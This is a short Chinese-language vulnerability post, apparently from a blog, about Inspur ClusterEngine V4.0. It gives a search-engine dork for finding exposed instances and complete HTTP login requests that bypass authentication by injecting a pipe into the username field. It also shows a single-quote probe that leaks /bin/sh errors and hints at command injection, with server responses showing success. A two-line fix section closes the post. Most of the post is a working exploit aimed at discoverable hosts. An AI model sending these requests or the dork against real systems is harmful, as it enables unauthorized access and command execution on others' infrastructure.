本文介绍了浪潮ClusterEngine V4.0集群管理平台的一个安全漏洞,该漏洞允许任意用户通过特定的登录方式访问系统,并可能导致命令执行。攻击者可以利用登录过程中的username字段值注入来触发系统错误,获取敏感信息。修复建议包括升级到最新版本和实施访问限制。
概述
浪潮clusterengine v4.0 集群管理平台,可管理集群系统中的软硬件资源和用户提交的作业,根据集群中的资源使用情况来合理的调度用户提交的作业,从而达到提高资源的利用率和作业的执行效率的作用。
在网络空间测绘搜索引擎中搜索关键字:
title="TSCEV4.0"或者"clusterengine v4.0"收集相关资产。
任意用户登录
指定登录过程中的username字段值为"any|pwd"形式即可登录系统:
POST /login HTTP/1.1 Host: xxx Content-Length: 42 Sec-Ch-Ua: " Not A;Brand";v="99", "Chromium";v="90" Accept: application/json, text/javascript, */*; q=0.01 X-Requested-With: XMLHttpRequest Sec-Ch-Ua-Mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.106 Safari/537.36 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q= op=login&username=aa%7Cpwd&password=123123
响应包为如下,即登录成功:
HTTP/1.1 200
Set-Cookie: username=aa|pwd; Max-Age=604800; Expires=Mon, 19-Apr-2021 14:42:23 GMT; Path=/; HttpOnly
Set-Cookie: userType=users; Max-Age=43200; Expires=Tue, 13-Apr-2021 02:42:23 GMT; Path=/; HttpOnly
Set-Cookie: vertifyUser=true; Max-Age=43200; Expires=Tue, 13-Apr-2021 02:42:23 GMT; Path=/; HttpOnly
Set-Cookie: L_TIMES=1618238543432; Max-Age=604800; Expires=Mon, 19-Apr-2021 14:42:23 GMT; Path=/; HttpOnly
Content-Type: text/json;charset=utf-8
Date: Mon, 12 Apr 2021 14:42:23 GMT
Connection: close
Content-Length: 35
{"err":"","exitcode":0,"out":"/\n"}
任意命令执行
对登录请求中的username参数,传入单引号使其报错,响应包中会爆出/bin/sh -c 报错信息,你懂得:
POST /login HTTP/1.1 Host: xxx Content-Length: 42 Sec-Ch-Ua: " Not A;Brand";v="99", "Chromium";v="90" Accept: application/json, text/javascript, */*; q=0.01 X-Requested-With: XMLHttpRequest Sec-Ch-Ua-Mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.106 Safari/537.36 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q= op=login&username=aa'&password=123123
报错信息:
HTTP/1.1 200
Content-Type: text/json;charset=utf-8
Date: Mon, 12 Apr 2021 14:44:13 GMT
Connection: close
Content-Length: 159
{"err":"/bin/sh: -c: line 0: unexpected EOF while looking for matching `''\n/bin/sh: -c: line 1: syntax error: unexpected end of file\n","exitcode":1,"out":""}
没搞明白为什么代码这么写。
修复建议
-
升级至最新版本;
-
临时方案可进行访问限制。
扫一扫
1942
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
